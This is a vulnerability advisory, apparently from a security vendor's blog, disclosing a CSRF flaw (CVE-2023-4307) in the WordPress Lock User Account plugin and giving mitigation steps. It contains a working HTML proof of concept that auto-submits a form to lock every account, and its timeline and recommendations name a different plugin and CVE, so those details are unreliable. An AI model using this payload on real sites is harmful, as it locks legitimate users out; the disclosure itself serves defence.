In the pursuit of robust website security, a profound vulnerability has emerged during the assessment of WordPress plugins. A striking vulnerability within the Lock User Account plugin was discovered, heralding a serious threat. This vulnerability exposes an avenue for malicious attackers to enact an untraceable lockout of all user accounts, capitalizing on a Cross-Site Request Forgery (CSRF) vulnerability.

Main info:

CVECVE-2023-4307
PluginLock User Account
CriticalHigh
Publicly PublishedAugust 21, 2023
Last UpdatedAugust 21, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A2: Broken Authentication and Session Management
PoCYes
ExploitNo
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4307
https://wpscan.com/vulnerability/06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3
Plugin Security Certification by CleanTalk

Timeline

August 4, 2023Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
August 4, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
August 12, 2023The author has removed his plugin from WordPress library
August 22, 2023Registered CVE-2023-4307

Discovery of the Vulnerability

In the process of testing the plugin, which makes it possible to block the account of any user, a CSRF vulnerability was found, which allows the administrator to block all accounts when clicking on a malicious link. At the same time, the administrator will not know about it. There is no _wpnonce check in the plugin

Understanding of CSRF attack’s

Cybercriminals can craft a malicious link that, when clicked by an unwitting administrator, invokes unauthorized actions within the Lock User Account plugin. The impact is astounding – the attacker can swiftly lock all user accounts without the administrator’s knowledge. The lack of an essential _wpnonce check in the plugin facilitates this alarming exploit. CSRF – OWASP TOP-10

Exploiting the CSRF vulnerability

Administrators unknowingly executing the malicious link could inadvertently freeze every WordPress user’s account. The implications are severe, rendering the website inaccessible to users and disrupting the digital ecosystem.

POC html code:

<html>

  <body>

  <script>history.pushState(”, ”, ‘/’)</script>

    <form action=”http://your_site/wordpress/wp-admin/users.php”>

      <input type=”hidden” name=”s” value=”” />

      <input type=”hidden” name=”action” value=”lock” />

      <input type=”hidden” name=”new&#95;role” value=”” />

      <input type=”hidden” name=”paged” value=”1″ />

      <input type=”hidden” name=”users&#91;0&#93;” value=”1″ />

      <input type=”hidden” name=”users&#91;1&#93;” value=”2″ />

      <input type=”hidden” name=”users&#91;2&#93;” value=”3″ />

      <input type=”hidden” name=”users&#91;3&#93;” value=”4″ />

      <input type=”hidden” name=”action2″ value=”lock” />

      <input type=”hidden” name=”new&#95;role2″ value=”” />

      <input type=”submit” value=”Submit request” />

    </form>

    <script>

      document.forms[0].submit();

    </script>

  </body>

</html>

P.s. YOU CAN ADD ANY OTHER INPUT DATA WITH THE NAME=”USERS” AND THE VALUE=”YOUR_MAX_USERS_NUMBER”

Potential Risks and Real-World Impact

The CSRF vulnerability within the Lock User Account plugin introduces grave risks and potential scenarios:

  1. Unauthorized Account Blocking:
    An attacker could craft a malicious link and trick the administrator into clicking on it unknowingly. This would lead to the administrator unintentionally blocking all user accounts on the website.
  2. Mass Account Disruption:
    As all user accounts get blocked, it could lead to a mass disruption of user access to the website. This might cause significant inconvenience to users and damage the reputation of the website.
  3. Denial of Service (DoS):
    By blocking all accounts, the website may effectively experience a DoS situation, preventing legitimate users from accessing their accounts and using the website’s services.

Recommendations for Improved Security

Safeguard your WordPress environment against CVE-2023-4019 and fortify your digital stronghold:

  • Delete plugin:
    Since the plugin has been removed from the wordpress library, it is necessary to remove it. Current version will be vulnerable to this attack
  • Implement _wpnonce Verification::
    Enhance the plugin’s defenses by incorporating robust _wpnonce verification. This step acts as a formidable barrier against CSRF attacks, thwarting unauthorized actions.
  • Regular Security Audits:
    Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
  • Educate Administrators:
    Educate administrators about the nature of CSRF attacks and the importance of cautious clicking. Raising awareness among your team can prevent inadvertent actions that could compromise site security.

By disseminating this crucial information throughout the WordPress community, we can collectively bolster the security of countless websites. Share this knowledge to ensure that administrators are well-equipped to defend against the CVE-2023-4307 vulnerability and to maintain the safety of their WordPress sites.

#WordPressSecurity #CSRFVulnerability #WebsiteProtection #StayInformed

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


Check my website

CVE-2023-4307 – Lock User Account <= 1.0.3 - Arbitrary Lock/Unlock All Account's via CSRF

Leave a Reply

Your email address will not be published. Required fields are marked *